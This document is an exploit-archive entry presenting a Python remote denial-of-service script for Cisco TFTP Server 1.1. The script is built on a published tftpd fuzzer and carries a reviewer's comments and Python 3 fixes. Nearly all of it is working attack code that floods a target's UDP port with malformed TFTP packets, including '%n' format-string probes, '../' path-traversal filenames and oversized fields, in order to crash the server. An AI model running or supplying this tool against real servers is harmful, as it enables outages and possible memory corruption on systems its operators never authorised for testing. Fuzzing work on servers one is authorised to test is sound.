# Exploit Title: [Cisco TFTP Server 1.1]
# Date: [2010-03-25]
# Author: [_SuBz3r0_]
# Software Link: [http://www.oldversion.com/Cisco_TFTP_Server.html]
# Version: [1.1]
# Tested on: [XP SP3,Win2k3]
# CVE : [if exists]
# Code :
# Cisco TFTP Server v1.1 DoS
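# Banner, printed unconditionally when the script starts.  The pasted listing
# had a stray " |" after every line (a syntax error) and used the Python-2-only
# print statement; a single-argument print(...) behaves identically on
# Python 2 and 3, so the banner is now version-neutral.
print("")
print("##############################################")
print("# _SuBz3r0_ #")
print("##############################################")
print("")
print("Cisco TFTP v1.1 Remote DoS")
print("Just For Fun")
print("tftp_fuzz.py [ip of server]")
print("")
print("Greetz:piloo le canari & MaX")
print("Credits to Ilja van Sprundel")
print("Tested on: French Windows Xp Sp3 fully Patched")
print("")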
|
#!/usr/bin/python
# tftpd fuzzer by Ilja van Sprundel
# implements rfc 1350, 2090, 2347, 2348, 2349
#
# todo: - 1 option per packet
# - lots (>100) (small) options per packet
# - add better option support to OACK
# - client fuzzing ?
import os
import random
import socket
import struct
import sys
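port = 69  # default TFTP server port (RFC 1350); __main__ may override it from argv[2]

# RFC 1350 transfer modes plus two junk values ("binary", "mail") offered to
# see how the server's mode parser copes with something it does not know.
modes = ["netascii", "octet", "binary", "mail"]
type = modes  # original name, kept for compatibility; note it shadows the builtin `type`

# Option names emitted for option slots 17/18.  The pasted listing spelled the
# first one "blkzise", which no server recognises; RFC 2348 defines "blksize".
asize = ["blksize", "tsize"]


class fuzz:
    """Blind TFTP request fuzzer (Ilja van Sprundel's tftpd fuzzer).

    Builds malformed RRQ/WRQ/DATA/ACK/ERROR/OACK packets covering RFC 1350,
    2090, 2347, 2348 and 2349 and fires them at a UDP port without ever
    reading a reply.  A crash is therefore visible only on the target side:
    run it only against a server you are authorised to test, and watch the
    service (or a debugger attached to it) there.

    NOTE(review): the listing this was recovered from had all indentation
    stripped; the nesting below is reconstructed from the control flow and
    the original fuzzer's logic.
    """

    def __init__(self):
        """No state is kept between packets; each one is drawn fresh from `random`."""

    def randstring(self, len):
        """Return `len` random non-NUL characters (chr 1..255) as a str.

        One time in six the length is ignored and a fixed run of "%n" is
        returned instead -- a format-string probe: a server that feeds the
        filename or mode into a printf-style call will write to memory.
        """
        thestring = ""
        what = random.randint(0, 5)
        if what < 5:
            for i in range(len):
                char = chr(random.randint(1, 255))
                thestring += char
        else:
            thestring = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
        return thestring

    def randbin(self, len):
        """Return `len` random characters (chr 0..255), NULs included, as a str."""
        thestring = ""
        for i in range(len):
            char = chr(random.randint(0, 255))
            thestring += char
        return thestring

    def fuzz_rw(self):
        """Build the body of a RRQ/WRQ after the opcode.

        Layout is filename, NUL, mode, NUL, then option name/value pairs
        each NUL-terminated (RFC 2347).  At every boundary a small random
        chance truncates the packet early (missing NUL, missing mode, no
        options) so the server's parser sees each malformed prefix.  The
        filename may be prefixed with "../" as a directory-traversal probe.
        """
        data = ""
        # 1 in 51: an empty body (opcode only).
        if not random.randint(0, 50):
            return ""
        # 1 in 11: lead the filename with "../" (once, or 1..100 times) -- a
        # path-traversal probe against servers that do not canonicalise paths.
        if not random.randint(0, 10):
            if random.randint(0, 1):
                data = "../"
            else:
                howmany = random.randint(1, 100)
                data = "../" * howmany
        data += self.randstring(random.randint(0, 3000))
        # 1 in 11: omit the NUL that terminates the filename.
        if not random.randint(0, 10):
            return data
        data += "\0"
        # 1 in 101: omit the mode entirely.
        if not random.randint(0, 100):
            return data
        if random.randint(0, 5):
            data += random.choice(modes)
        else:
            data += self.randstring(random.randint(0, 3000))
        # 1 in 11: omit the NUL after the mode.
        if not random.randint(0, 10):
            return data
        data += "\0"
        # 1 in 11: no option block at all.
        if not random.randint(0, 10):
            return data

        # Option block: `options` name/value pairs.
        options = random.randint(0, 100)
        # 1 in 11: stop mid-block at index `breakit`, leaving the last pair
        # without its terminating NUL.
        if not random.randint(0, 10):
            breakloop = 1
            breakit = random.randint(0, options)
        else:
            breakloop = 0
        # Exactly one option (index `longarg`) gets an oversized (up to 3000
        # byte) name; the rest stay short.
        longarg = random.randint(0, options)
        # 1 in 11: emit only the well-known options (multicast/blksize/tsize/
        # timeout), and fewer of them.  Floor division keeps range() valid on
        # Python 3, where the original `/` would yield a float.
        if not random.randint(0, 10):
            lowlimit = 16
            options = options // 4
        else:
            lowlimit = 0
        for i in range(options):
            which = random.randint(lowlimit, 19)
            if which < 16:
                # Arbitrary option: random name, NUL, random value.
                if longarg == i:
                    data += self.randstring(random.randint(0, 3000))
                else:
                    data += self.randstring(random.randint(0, 100))
                data += "\0"
                data += self.randstring(random.randint(0, 100))
            if which == 16:
                # RFC 2090 multicast normally carries an empty value, so only
                # 1 in 6 gets junk or a large number.
                data += "multicast\0"
                if not random.randint(0, 5):
                    if random.randint(0, 1):
                        data += self.randstring(random.randint(0, 50))
                    else:
                        data += str(random.randint(0, 0xffffffff))
            if which == 17 or which == 18:
                # RFC 2348 blksize / RFC 2349 tsize: a number that is sometimes
                # negative, sometimes beyond 16 bits, sometimes not a number.
                data += random.choice(asize) + "\0"
                if random.randint(0, 10):
                    if random.randint(0, 1):
                        uplimit = 65535
                    else:
                        uplimit = 0xffffffff
                    string = str(random.randint(0, uplimit))
                    if random.randint(0, 1):
                        data += "-"
                    data += string
                else:
                    data += self.randstring(random.randint(0, 50))
            if which == 19:
                # RFC 2349 timeout: mostly within the RFC's 1..255 range,
                # sometimes 16- or 32-bit sized.  The original wrote
                # `if size < 4: ... if size == 4: ... else: ...`, so the 255
                # limit was immediately overwritten by 0xffffffff; the elif
                # restores the intended three-way split.
                data += "timeout\0"
                if random.randint(0, 10):
                    size = random.randint(0, 5)
                    if size < 4:
                        uplimit = 255
                    elif size == 4:
                        uplimit = 65535
                    else:
                        uplimit = 0xffffffff
                    string = str(random.randint(0, uplimit))
                    if random.randint(0, 1):
                        data += "-"
                    data += string
                else:
                    data += self.randstring(random.randint(0, 50))
            if breakloop:
                if i == breakit:
                    return data
            data += "\0"
        return data

    def make_data(self):
        """Return one complete TFTP packet as a str.

        6/11 of the time a RRQ/WRQ (reads 2:1, since more servers accept
        reads than writes) with a fuzz_rw() body; 1/11 each a DATA, ACK,
        ERROR or OACK with random block/error numbers and payload; and 1/11
        pure random bytes, usually up to 512 but sometimes up to 10000 --
        well past the 512-byte default block size.
        """
        which = random.randint(0, 10)
        if which < 6:
            if random.randint(0, 2):
                d = "\x00\x01"
            else:
                d = "\x00\x02"
            d += self.fuzz_rw()
        elif which == 6:
            # DATA: 2-byte block number, then up to 3000 bytes (limit is 512).
            d = "\x00\x03"
            d += self.randbin(2)
            d += self.randbin(random.randint(0, 3000))
        elif which == 7:
            # ACK: block number, 1 in 11 with trailing junk a strict parser should reject.
            d = "\x00\x04"
            d += self.randbin(2)
            if not random.randint(0, 10):
                d += self.randbin(random.randint(0, 3000))
        elif which == 8:
            # ERROR: error code, message, and (usually) the terminating NUL.
            d = "\x00\x05"
            d += self.randbin(2)
            d += self.randstring(random.randint(0, 1000))
            if random.randint(0, 10):
                d += "\0"
        elif which == 9:
            # OACK: not modelled yet, just 1000 random bytes (see the todo at the top).
            d = "\x00\x06"
            d += self.randbin(1000)
        else:
            if random.randint(0, 2):
                times = 512
            else:
                times = random.randint(512, 10000)
            d = self.randbin(random.randint(0, times))
        return d

    def run(self, target=None, dport=None):
        """Send packets until Ctrl-C, one fresh UDP socket per packet.

        `target` and `dport` default to the module globals `host` (set by
        __main__) and `port`.  Nothing is ever received: each packet leaves
        from a new ephemeral source port and no reply is read, so a server
        crash shows up only as the target going quiet.  Prints one "." per
        packet and the packet count on exit.
        """
        if target is None:
            target = host  # module global, assigned in __main__
        if dport is None:
            dport = port
        packets = 0
        try:
            while 1:
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                except socket.error as e:
                    # The original had a bare string expression here, which prints nothing.
                    sys.stderr.write("socket() failed: %s\n" % e)
                    sys.exit(1)
                try:
                    da = self.make_data()
                    if not isinstance(da, bytes):
                        # Python 3: chr() produced text code points 0..255; latin-1
                        # maps them back to single bytes 1:1.  No-op on Python 2,
                        # where str already is bytes.
                        da = da.encode("latin-1")
                    s.sendto(da, (target, dport))
                finally:
                    s.close()  # also closed when sendto() raises
                os.write(1, b".")
                packets += 1
        except KeyboardInterrupt:
            # The original had a bare string expression here, which prints nothing.
            sys.stdout.write("\nPackets: %d\n" % packets)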
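if __name__ == '__main__':
    # Usage: tftp_fuzz.py <target ip> [port].  This sends a flood of malformed
    # UDP packets and reads nothing back -- point it only at hosts you are
    # authorised to test.
    if len(sys.argv) <= 1:
        sys.stderr.write("usage: %s <target ip> [port]\n" % sys.argv[0])
        sys.exit(0)
    host = sys.argv[1]
    if len(sys.argv) >= 3:
        # The original stored the raw argv string; sendto() needs an int port.
        try:
            port = int(sys.argv[2])
        except ValueError:
            sys.stderr.write("bad port: %r\n" % sys.argv[2])
            sys.exit(1)
    f = fuzz()
    f.run()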